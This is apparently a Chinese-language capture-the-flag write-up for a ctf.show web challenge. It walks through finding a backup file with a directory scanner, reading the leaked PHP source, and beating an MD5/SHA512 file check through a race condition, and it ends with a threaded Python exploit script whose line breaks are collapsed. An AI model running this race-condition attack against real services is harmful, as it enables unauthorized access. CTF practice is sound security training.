0x00 前言

• CTF 加解密合集
• CTF Web合集

0x01 题目

0x02 Write Up

首先跑一下字典，这里用的dirmap,可以看到有一个web.zip

下载下来之后发现是一个网站备份，备份的是check.php.bak

然后接着看，可以看到这里不太可能是sql注入，有一个请求 check.php?token="+token+"&php://input"

正好接着上一个文件备份的内容，看一下源码

首先token是将date("i")进行md5，然后就是文件md5对比，要求md5一致，但是sha512不一样，这里比较的文件是key.dat

直接访问进行下载即可。

原理就是将上传的文件保存为flag.dat,然后进行对比，那么这种情况肯定会出现条件竞争，也就是说flag.dat在比较完第一次之后被覆盖了的话，就可以满足第二个条件

import requests
import time
import hashlib
import threadingi=str(time.localtime().tm_min)
m=hashlib.md5(i.encode()).hexdigest()def go_to(data):try:url=f"http://1babff5a-576a-48b8-9f50-d4feeb5b7cbd.challenge.ctf.show/check.php?token={m}&php://input"s=requests.post(url,data=data)print(s.text)except Exception as e:passwith open('key.dat','rb') as t:data1=t.read()pass
for i in range(20):threading.Thread(target=go_to,args=(data1,)).start()
for i in range(20):data2='abbcd'threading.Thread(target=go_to,args=(data2,)).start()

以上